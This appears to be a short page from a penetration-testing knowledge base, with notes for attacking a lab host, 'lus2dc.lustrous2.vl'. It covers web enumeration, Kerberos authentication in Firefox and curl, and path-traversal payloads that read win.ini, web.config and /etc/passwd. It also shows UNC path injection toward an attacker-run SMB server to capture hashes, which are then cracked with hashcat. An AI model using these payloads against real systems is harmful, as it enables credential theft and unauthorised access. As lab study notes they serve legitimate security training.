HTTP

Visit the website to find usernames
Try to understand the website
Look at the source code
Feroxbuster for directory enumeration
Subdomain Enumeration

Kerberos authentication

Firefox

about:config

network.negotiate-auth.delegation-uris: lus2dc.lustrous2.vl
network.negotiate-auth.trusted-uris: lus2dc.lustrous2.vl
network.negotiate-auth.using-native-gsslib: true

Curl

curl http://lus2dc.lustrous.vl -u:Thomas.Myers --negotiate -I

LFI

Checking if LFI is present

Windows

http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\..\..\windows\win.ini

curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\web.config' -u: --negotiate

Linux

http://lus2dc.lustrous2.vl/File/Download?fileName=../../../etc/passwd

UNC Path Injection

sudo /home/user/.local/bin/smbserver.py share shared -smb2support

curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.2.41\shared\test' -u:Thomas.Myers --negotiate -I

hashcat hash /usr/share/wordlists/rockyou.txt

Malleum Knowledge Base

Explorer

HTTP

Kerberos authentication

Firefox

Curl

LFI

Checking if LFI is present

Windows

Linux

UNC Path Injection

Graph View

Table of Contents